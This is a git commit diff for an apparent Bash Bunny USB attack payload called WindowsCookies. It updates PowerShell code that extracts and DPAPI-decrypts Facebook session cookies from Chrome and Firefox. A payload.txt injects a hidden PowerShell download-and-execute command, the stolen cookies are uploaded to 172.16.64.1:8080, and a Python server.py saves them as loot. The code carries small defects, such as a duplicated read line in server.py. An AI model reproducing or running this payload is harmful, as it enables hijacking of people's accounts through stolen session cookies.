Updated WindowsCookie for firmware v1.1 and fix powershell regex for Windows 7 (#161)

2017-04-10 03:11:33 +01:00 · 2017-04-10 03:11:33 +01:00 · 32468087e1
parent ce0c7d2dbd
commit 32468087e1
5 changed files with 266 additions and 260 deletions
--- a/payloads/library/WindowsCookies/README.md
+++ b/payloads/library/WindowsCookies/README.md
@ -1,13 +1,13 @@
 # WindowsCookies for Bash Bunnys
 Author: oXis    
-Version: Version 2.0    
+Version: Version 2.1    
 Credit: illwill, sekirkity, EmpireProject     
 ## Description
 Based on BrowserCreds from illwill, this version grabs Facebook session cookies from Chrome/Firefox on Windows, decrypt them and put them in /root/udisk/loot/FacebookSession    
-Only works for Chrome/Firefox on Windows. Tested on two different Windows 10 machines.    
+Only works for Chrome/Firefox on Windows. Tested on two different Windows 10 machines, now works on Windows 7 (fixed powershell regex)    
 Only payload.txt, server.py and p are required.    
 Server.py will load a local HTTP server, the script is downloaded from that server and then uploads the cookies to it.    
@ -16,6 +16,6 @@ Server.py will load a local HTTP server, the script is downloaded from that serv
 | LED              | Status                                 |
 | ---------------- | -------------------------------------- |
 | Blue (blinking)  | Payload init                           |
-| White (blinking) | Setup RNDIS_ETHERNET  				    |
+| Yellow (blinking)| Setup RNDIS_ETHERNET  				    |
 | Green (blinking) | Done               				    |
--- a/payloads/library/WindowsCookies/get_facebook_cookies.ps1
+++ b/payloads/library/WindowsCookies/get_facebook_cookies.ps1
@ -1,118 +1,124 @@
-# Instructions: import the module, then perform the commanded needed.
+# Instructions: import the module, then perform the commanded needed.
-
+
-# Chrome Facebook cookies extraction
+# Chrome Facebook cookies extraction
-# Use: Get-FacebookCreds [path to Login Data]
+# Use: Get-FacebookCreds [path to Login Data]
-# Path is optional, use if automatic search doesn't work
+# Path is optional, use if automatic search doesn't work
-
+
-function Get-FacebookCreds-Firefox() {
+function Get-FacebookCreds-Firefox() {
-	Param(
+	Param(
-		[String]$Path
+		[String]$Path
-	)
+	)
-
+
-	if ([String]::IsNullOrEmpty($Path)) {
+	if ([String]::IsNullOrEmpty($Path)) {
-        # $Path = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Cookies"
+        # $Path = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Cookies"
-		$path = Get-ChildItem "$env:USERPROFILE\AppData\Roaming\Mozilla\Firefox\Profiles\*.default\cookies.sqlite"
+		$path = Get-ChildItem "$env:USERPROFILE\AppData\Roaming\Mozilla\Firefox\Profiles\*.default\cookies.sqlite"
-	}
+	}
-
+
-	if (![system.io.file]::Exists($Path))
+	if (![system.io.file]::Exists($Path))
-	{
+	{
-		Write-Error 'Chrome db file doesnt exist, or invalid file path specified.'
+		Write-Error 'Chrome db file doesnt exist, or invalid file path specified.'
-		Break
+		Break
-	}
+	}
-
+
-	Add-Type -AssemblyName System.Security
+	Add-Type -AssemblyName System.Security
-	# Credit to Matt Graber for his technique on using regular expressions to search for binary data
+	# Credit to Matt Graber for his technique on using regular expressions to search for binary data
-	$Stream = New-Object IO.FileStream -ArgumentList "$Path", 'Open', 'Read', 'ReadWrite'
+	$Stream = New-Object IO.FileStream -ArgumentList "$Path", 'Open', 'Read', 'ReadWrite'
-	$Encoding = [system.Text.Encoding]::GetEncoding(28591)
+	$Encoding = [system.Text.Encoding]::GetEncoding(28591)
-	$StreamReader = New-Object IO.StreamReader -ArgumentList $Stream, $Encoding
+	$StreamReader = New-Object IO.StreamReader -ArgumentList $Stream, $Encoding
-	$BinaryText = $StreamReader.ReadToEnd()
+	$BinaryText = $StreamReader.ReadToEnd()
-	$StreamReader.Close()
+	$StreamReader.Close()
-	$Stream.Close()
+	$Stream.Close()
-
+
-	# First the magic bytes for the facebook string, datr size is 24
+	# First the magic bytes for the facebook string, datr size is 24
-	$PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x64\x61\x74\x72([\s\S]{24})'
+	$PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x64\x61\x74\x72([\s\S]{24})'
-	$PwdMatches = $PwdRegex.Matches($BinaryText)
+	$PwdMatches = $PwdRegex.Matches($BinaryText)
-	$datr = $PwdMatches.groups[1]
+	$datr = $PwdMatches | ForEach-Object { $_.Groups[1].Value }
-
+	# $datr = $PwdMatches.groups[1]
-	# First the magic bytes for the facebook string, c_user size is 15
+
-	$PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x63\x5F\x75\x73\x65\x72([\s\S]{15})'
+	# First the magic bytes for the facebook string, c_user size is 15
-	$PwdMatches = $PwdRegex.Matches($BinaryText)
+	$PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x63\x5F\x75\x73\x65\x72([\s\S]{15})'
-	$c_user = $PwdMatches.groups[1]
+	$PwdMatches = $PwdRegex.Matches($BinaryText)
-
+	$c_user = $PwdMatches | ForEach-Object { $_.Groups[1].Value }
-	# First the magic bytes for the facebook string, xs size is 44
+	# $c_user = $PwdMatches.groups[1]
-	$PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x78\x73([\s\S]{44})'
+
-	$PwdMatches = $PwdRegex.Matches($BinaryText)
+	# First the magic bytes for the facebook string, xs size is 44
-	$xs = $PwdMatches.groups[1]
+	$PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x78\x73([\s\S]{44})'
-
+	$PwdMatches = $PwdRegex.Matches($BinaryText)
-	"$env:computername ---> "
+	$xs = $PwdMatches | ForEach-Object { $_.Groups[1].Value }
-	"datr is $datr ###"
+	# $xs = $PwdMatches.groups[1]
-	"c_user is $c_user ###"
+
-	"xs is $xs ###"
+	"Firefox ---> "
-}
+	"datr is $datr ###"
-
+	"c_user is $c_user ###"
-function Get-FacebookCreds-Chrome() {
+	"xs is $xs ###"
-	Param(
+}
-		[String]$Path
+
-	)
+function Get-FacebookCreds-Chrome() {
-
+	Param(
-	if ([String]::IsNullOrEmpty($Path)) {
+		[String]$Path
-        $Path = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Cookies"
+	)
-	}
+
-
+	if ([String]::IsNullOrEmpty($Path)) {
-	if (![system.io.file]::Exists($Path))
+        $Path = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Cookies"
-	{
+	}
-		Write-Error 'Chrome db file doesnt exist, or invalid file path specified.'
+
-		Break
+	if (![system.io.file]::Exists($Path))
-	}
+	{
-
+		Write-Error 'Chrome db file doesnt exist, or invalid file path specified.'
-	Add-Type -AssemblyName System.Security
+		Break
-	# Credit to Matt Graber for his technique on using regular expressions to search for binary data
+	}
-	$Stream = New-Object IO.FileStream -ArgumentList "$Path", 'Open', 'Read', 'ReadWrite'
+
-	$Encoding = [system.Text.Encoding]::GetEncoding(28591)
+	Add-Type -AssemblyName System.Security
-	$StreamReader = New-Object IO.StreamReader -ArgumentList $Stream, $Encoding
+	# Credit to Matt Graber for his technique on using regular expressions to search for binary data
-	$BinaryText = $StreamReader.ReadToEnd()
+	$Stream = New-Object IO.FileStream -ArgumentList "$Path", 'Open', 'Read', 'ReadWrite'
-	$StreamReader.Close()
+	$Encoding = [system.Text.Encoding]::GetEncoding(28591)
-	$Stream.Close()
+	$StreamReader = New-Object IO.StreamReader -ArgumentList $Stream, $Encoding
-
+	$BinaryText = $StreamReader.ReadToEnd()
-	# First the magic bytes for the facebook string, datr size is 242 + 4 and hex is \x64\x61\x74\x72
+	$StreamReader.Close()
-	$PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x64\x61\x74\x72)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{242})'
+	$Stream.Close()
-	$PwdMatches = $PwdRegex.Matches($BinaryText)
+
-
+	# First the magic bytes for the facebook string, datr size is 242 + 4 and hex is \x64\x61\x74\x72
-	# [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2]));
+	$PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x64\x61\x74\x72)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{242})'
-	$Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
+	$PwdMatches = $PwdRegex.Matches($BinaryText)
-	$Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
+
-	$datr = [System.Text.Encoding]::Default.GetString($Decrypt)
+	# [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2]));
-
+	$Pwd = $Encoding.GetBytes(($PwdMatches | ForEach-Object { $_.Groups[2].Value }))
-
+	# $Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
-	# First the magic bytes for the facebook string, c_user size is 226 + 4 and hex is \x63\x5F\x75\x73\x65\x72
+	$Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
-	$PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x63\x5F\x75\x73\x65\x72)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{226})'
+	$datr = [System.Text.Encoding]::Default.GetString($Decrypt)
-	$PwdMatches = $PwdRegex.Matches($BinaryText)
+
-
+
-	# [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2]));
+	# First the magic bytes for the facebook string, c_user size is 226 + 4 and hex is \x63\x5F\x75\x73\x65\x72
-	$Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
+	$PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x63\x5F\x75\x73\x65\x72)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{226})'
-	$Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
+	$PwdMatches = $PwdRegex.Matches($BinaryText)
-	$c_user = [System.Text.Encoding]::Default.GetString($Decrypt)
+
-
+	# [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2]));
-
+	$Pwd = $Encoding.GetBytes(($PwdMatches | ForEach-Object { $_.Groups[2].Value }))
-	# First the magic bytes for the facebook string, xs size is 258 + 4 and hex is \x78\x73
+	# $Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
-	$PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x78\x73)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{258})'
+	$Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
-	$PwdMatches = $PwdRegex.Matches($BinaryText)
+	$c_user = [System.Text.Encoding]::Default.GetString($Decrypt)
-
+
-	# [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2]));
+
-	$Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
+	# First the magic bytes for the facebook string, xs size is 258 + 4 and hex is \x78\x73
-	$Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
+	$PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x78\x73)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{258})'
-	$xs = [System.Text.Encoding]::Default.GetString($Decrypt)
+	$PwdMatches = $PwdRegex.Matches($BinaryText)
-
+
-	"$env:computername ---> "
+	# [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2]));
-	"datr is $datr ###"
+	$Pwd = $Encoding.GetBytes(($PwdMatches | ForEach-Object { $_.Groups[2].Value }))
-	"c_user is $c_user ###"
+	# $Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
-	"xs is $xs ###"
+	$Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
-}
+	$xs = [System.Text.Encoding]::Default.GetString($Decrypt)
-
+
-
+	"Chrome ---> "
-function Payload() {
+	"datr is $datr ###"
-
+	"c_user is $c_user ###"
-	Invoke-Expression (New-Object Net.WebClient).UploadString('http://172.16.64.1:8080/l', $(Get-FacebookCreds-Chrome))
+	"xs is $xs ###"
-	Invoke-Expression (New-Object Net.WebClient).UploadString('http://172.16.64.1:8080/l', $(Get-FacebookCreds-Firefox))
+}
-
+
-}
+
 function Payload() {
 	Invoke-Expression (New-Object Net.WebClient).UploadString("http://172.16.64.1:8080/$env:computername", $(Get-FacebookCreds-Chrome))
 	Invoke-Expression (New-Object Net.WebClient).UploadString("http://172.16.64.1:8080/$env:computername", $(Get-FacebookCreds-Firefox))
 }
--- a/payloads/library/WindowsCookies/p
+++ b/payloads/library/WindowsCookies/p
@ -1,118 +1,124 @@
-# Instructions: import the module, then perform the commanded needed.
+# Instructions: import the module, then perform the commanded needed.
-
+
-# Chrome Facebook cookies extraction
+# Chrome Facebook cookies extraction
-# Use: Get-FacebookCreds [path to Login Data]
+# Use: Get-FacebookCreds [path to Login Data]
-# Path is optional, use if automatic search doesn't work
+# Path is optional, use if automatic search doesn't work
-
+
-function Get-FacebookCreds-Firefox() {
+function Get-FacebookCreds-Firefox() {
-	Param(
+	Param(
-		[String]$Path
+		[String]$Path
-	)
+	)
-
+
-	if ([String]::IsNullOrEmpty($Path)) {
+	if ([String]::IsNullOrEmpty($Path)) {
-        # $Path = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Cookies"
+        # $Path = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Cookies"
-		$path = Get-ChildItem "$env:USERPROFILE\AppData\Roaming\Mozilla\Firefox\Profiles\*.default\cookies.sqlite"
+		$path = Get-ChildItem "$env:USERPROFILE\AppData\Roaming\Mozilla\Firefox\Profiles\*.default\cookies.sqlite"
-	}
+	}
-
+
-	if (![system.io.file]::Exists($Path))
+	if (![system.io.file]::Exists($Path))
-	{
+	{
-		Write-Error 'Chrome db file doesnt exist, or invalid file path specified.'
+		Write-Error 'Chrome db file doesnt exist, or invalid file path specified.'
-		Break
+		Break
-	}
+	}
-
+
-	Add-Type -AssemblyName System.Security
+	Add-Type -AssemblyName System.Security
-	# Credit to Matt Graber for his technique on using regular expressions to search for binary data
+	# Credit to Matt Graber for his technique on using regular expressions to search for binary data
-	$Stream = New-Object IO.FileStream -ArgumentList "$Path", 'Open', 'Read', 'ReadWrite'
+	$Stream = New-Object IO.FileStream -ArgumentList "$Path", 'Open', 'Read', 'ReadWrite'
-	$Encoding = [system.Text.Encoding]::GetEncoding(28591)
+	$Encoding = [system.Text.Encoding]::GetEncoding(28591)
-	$StreamReader = New-Object IO.StreamReader -ArgumentList $Stream, $Encoding
+	$StreamReader = New-Object IO.StreamReader -ArgumentList $Stream, $Encoding
-	$BinaryText = $StreamReader.ReadToEnd()
+	$BinaryText = $StreamReader.ReadToEnd()
-	$StreamReader.Close()
+	$StreamReader.Close()
-	$Stream.Close()
+	$Stream.Close()
-
+
-	# First the magic bytes for the facebook string, datr size is 24
+	# First the magic bytes for the facebook string, datr size is 24
-	$PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x64\x61\x74\x72([\s\S]{24})'
+	$PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x64\x61\x74\x72([\s\S]{24})'
-	$PwdMatches = $PwdRegex.Matches($BinaryText)
+	$PwdMatches = $PwdRegex.Matches($BinaryText)
-	$datr = $PwdMatches.groups[1]
+	$datr = $PwdMatches | ForEach-Object { $_.Groups[1].Value }
-
+	# $datr = $PwdMatches.groups[1]
-	# First the magic bytes for the facebook string, c_user size is 15
+
-	$PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x63\x5F\x75\x73\x65\x72([\s\S]{15})'
+	# First the magic bytes for the facebook string, c_user size is 15
-	$PwdMatches = $PwdRegex.Matches($BinaryText)
+	$PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x63\x5F\x75\x73\x65\x72([\s\S]{15})'
-	$c_user = $PwdMatches.groups[1]
+	$PwdMatches = $PwdRegex.Matches($BinaryText)
-
+	$c_user = $PwdMatches | ForEach-Object { $_.Groups[1].Value }
-	# First the magic bytes for the facebook string, xs size is 44
+	# $c_user = $PwdMatches.groups[1]
-	$PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x78\x73([\s\S]{44})'
+
-	$PwdMatches = $PwdRegex.Matches($BinaryText)
+	# First the magic bytes for the facebook string, xs size is 44
-	$xs = $PwdMatches.groups[1]
+	$PwdRegex = [Regex] '\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x78\x73([\s\S]{44})'
-
+	$PwdMatches = $PwdRegex.Matches($BinaryText)
-	"$env:computername ---> "
+	$xs = $PwdMatches | ForEach-Object { $_.Groups[1].Value }
-	"datr is $datr ###"
+	# $xs = $PwdMatches.groups[1]
-	"c_user is $c_user ###"
+
-	"xs is $xs ###"
+	"Firefox ---> "
-}
+	"datr is $datr ###"
-
+	"c_user is $c_user ###"
-function Get-FacebookCreds-Chrome() {
+	"xs is $xs ###"
-	Param(
+}
-		[String]$Path
+
-	)
+function Get-FacebookCreds-Chrome() {
-
+	Param(
-	if ([String]::IsNullOrEmpty($Path)) {
+		[String]$Path
-        $Path = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Cookies"
+	)
-	}
+
-
+	if ([String]::IsNullOrEmpty($Path)) {
-	if (![system.io.file]::Exists($Path))
+        $Path = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Cookies"
-	{
+	}
-		Write-Error 'Chrome db file doesnt exist, or invalid file path specified.'
+
-		Break
+	if (![system.io.file]::Exists($Path))
-	}
+	{
-
+		Write-Error 'Chrome db file doesnt exist, or invalid file path specified.'
-	Add-Type -AssemblyName System.Security
+		Break
-	# Credit to Matt Graber for his technique on using regular expressions to search for binary data
+	}
-	$Stream = New-Object IO.FileStream -ArgumentList "$Path", 'Open', 'Read', 'ReadWrite'
+
-	$Encoding = [system.Text.Encoding]::GetEncoding(28591)
+	Add-Type -AssemblyName System.Security
-	$StreamReader = New-Object IO.StreamReader -ArgumentList $Stream, $Encoding
+	# Credit to Matt Graber for his technique on using regular expressions to search for binary data
-	$BinaryText = $StreamReader.ReadToEnd()
+	$Stream = New-Object IO.FileStream -ArgumentList "$Path", 'Open', 'Read', 'ReadWrite'
-	$StreamReader.Close()
+	$Encoding = [system.Text.Encoding]::GetEncoding(28591)
-	$Stream.Close()
+	$StreamReader = New-Object IO.StreamReader -ArgumentList $Stream, $Encoding
-
+	$BinaryText = $StreamReader.ReadToEnd()
-	# First the magic bytes for the facebook string, datr size is 242 + 4 and hex is \x64\x61\x74\x72
+	$StreamReader.Close()
-	$PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x64\x61\x74\x72)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{242})'
+	$Stream.Close()
-	$PwdMatches = $PwdRegex.Matches($BinaryText)
+
-
+	# First the magic bytes for the facebook string, datr size is 242 + 4 and hex is \x64\x61\x74\x72
-	# [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2]));
+	$PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x64\x61\x74\x72)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{242})'
-	$Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
+	$PwdMatches = $PwdRegex.Matches($BinaryText)
-	$Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
+
-	$datr = [System.Text.Encoding]::Default.GetString($Decrypt)
+	# [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2]));
-
+	$Pwd = $Encoding.GetBytes(($PwdMatches | ForEach-Object { $_.Groups[2].Value }))
-
+	# $Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
-	# First the magic bytes for the facebook string, c_user size is 226 + 4 and hex is \x63\x5F\x75\x73\x65\x72
+	$Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
-	$PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x63\x5F\x75\x73\x65\x72)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{226})'
+	$datr = [System.Text.Encoding]::Default.GetString($Decrypt)
-	$PwdMatches = $PwdRegex.Matches($BinaryText)
+
-
+
-	# [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2]));
+	# First the magic bytes for the facebook string, c_user size is 226 + 4 and hex is \x63\x5F\x75\x73\x65\x72
-	$Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
+	$PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x63\x5F\x75\x73\x65\x72)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{226})'
-	$Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
+	$PwdMatches = $PwdRegex.Matches($BinaryText)
-	$c_user = [System.Text.Encoding]::Default.GetString($Decrypt)
+
-
+	# [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2]));
-
+	$Pwd = $Encoding.GetBytes(($PwdMatches | ForEach-Object { $_.Groups[2].Value }))
-	# First the magic bytes for the facebook string, xs size is 258 + 4 and hex is \x78\x73
+	# $Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
-	$PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x78\x73)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{258})'
+	$Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
-	$PwdMatches = $PwdRegex.Matches($BinaryText)
+	$c_user = [System.Text.Encoding]::Default.GetString($Decrypt)
-
+
-	# [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2]));
+
-	$Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
+	# First the magic bytes for the facebook string, xs size is 258 + 4 and hex is \x78\x73
-	$Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
+	$PwdRegex = [Regex] '\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D(\x78\x73)\x2F[\s\S]*?(\x01\x00\x00\x00[\s\S]{258})'
-	$xs = [System.Text.Encoding]::Default.GetString($Decrypt)
+	$PwdMatches = $PwdRegex.Matches($BinaryText)
-
+
-	"$env:computername ---> "
+	# [System.BitConverter]::ToString($Encoding.GetBytes($PwdMatches.groups[2]));
-	"datr is $datr ###"
+	$Pwd = $Encoding.GetBytes(($PwdMatches | ForEach-Object { $_.Groups[2].Value }))
-	"c_user is $c_user ###"
+	# $Pwd = $Encoding.GetBytes($PwdMatches.groups[2])
-	"xs is $xs ###"
+	$Decrypt = [System.Security.Cryptography.ProtectedData]::Unprotect($Pwd,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)
-}
+	$xs = [System.Text.Encoding]::Default.GetString($Decrypt)
-
+
-
+	"Chrome ---> "
-function Payload() {
+	"datr is $datr ###"
-
+	"c_user is $c_user ###"
-	Invoke-Expression (New-Object Net.WebClient).UploadString('http://172.16.64.1:8080/l', $(Get-FacebookCreds-Chrome))
+	"xs is $xs ###"
-	Invoke-Expression (New-Object Net.WebClient).UploadString('http://172.16.64.1:8080/l', $(Get-FacebookCreds-Firefox))
+}
-
+
-}
+
 function Payload() {
 	Invoke-Expression (New-Object Net.WebClient).UploadString("http://172.16.64.1:8080/$env:computername", $(Get-FacebookCreds-Chrome))
 	Invoke-Expression (New-Object Net.WebClient).UploadString("http://172.16.64.1:8080/$env:computername", $(Get-FacebookCreds-Firefox))
 }
--- a/payloads/library/WindowsCookies/payload.txt
+++ b/payloads/library/WindowsCookies/payload.txt
@ -2,34 +2,31 @@
 #
 # Title:         Facebook session cookies dump
 # Author:        oXis (inspired by illwill)
-# Version:       2.0
+# Version:       2.1
 #
-# Dumps the stored session cookies from Chrome browser by downloading a Powershell script
+# Dumps the stored session cookies from Chrome/Firefox browser by downloading a Powershell script
-# then stashes them in /root/udisk/loot/FacebookSession/l
+# then stashes them in /root/udisk/loot/FacebookSession/COMPUTER_NAME
-# Credits to these guys for their powershell scripts:
+# Credit to illwill for the BrowerCreds payload
 # https://github.com/sekirkity/BrowserGather BrowserGather.ps1
 # https://github.com/EmpireProject/Empire    Get-FoxDump.ps1
 # Also credit to illwill for the BrowerCreds payload
 #
 # LED States 
 # Setup.............Setup
-# Blue..............Running Script
+# Yellow............Setup RNDIS_ETHERNET
 # White.............Setup RNDIS_ETHERNET
 # Green.............Got Browser Creds
 LED SETUP
 LOOTDIR=/root/udisk/loot/FacebookSession
 mkdir -p $LOOTDIR
 ATTACKMODE HID
 LED STAGE1
 GET SWITCH_POSITION
 cd /root/udisk/payloads/$SWITCH_POSITION/
 # server.py can now instant bind sockets 
 iptables -A OUTPUT -p udp --dport 53 -j DROP
 ./server.py &
 sleep 1
 #Dump Chrome Cookies
-RUN WIN "powershell -WindowStyle Hidden \"while(\$true){If(Test-Connection 172.16.64.1 -count 1 -quiet){sleep 2;IEX (New-Object Net.WebClient).DownloadString('http://172.16.64.1:8080/p'); Payload; exit}}\""
+RUN WIN "powershell -WindowStyle Hidden while(\$true){If(Test-Connection 172.16.64.1 -count 1 -quiet){sleep 2;IEX (New-Object Net.WebClient).DownloadString('http://172.16.64.1:8080/p'); Payload; exit}}"
 LED STAGE2
 ATTACKMODE RNDIS_ETHERNET
--- a/payloads/library/WindowsCookies/server.py
+++ b/payloads/library/WindowsCookies/server.py
@ -3,10 +3,9 @@ from os import curdir
 from os.path import join as pjoin
 from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
 # from http.server import BaseHTTPRequestHandler, HTTPServer
 class StoreHandler(BaseHTTPRequestHandler):
-    store_path = pjoin("/root/udisk/loot/FacebookSession/", 'l')
+    store_path = "/root/udisk/loot/FacebookSession"
    get_path = pjoin(curdir, 'p')
    def do_GET(self):
@ -18,16 +17,14 @@ class StoreHandler(BaseHTTPRequestHandler):
                self.wfile.write(fh.read().encode())
    def do_POST(self):
-        if self.path == '/l':
+        length = self.headers['content-length']
-            length = self.headers['content-length']
+        data = self.rfile.read(int(length))
            data = self.rfile.read(int(length))
-            with open(self.store_path, 'a') as fh:
+        with open(self.store_path + self.path, 'a') as fh:
-                fh.write(data.decode() + "\n")
+            fh.write(data.decode() + "\n")
-            self.send_response(200)
+        self.send_response(200)
 server = HTTPServer(('', 8080), StoreHandler)
 server.serve_forever()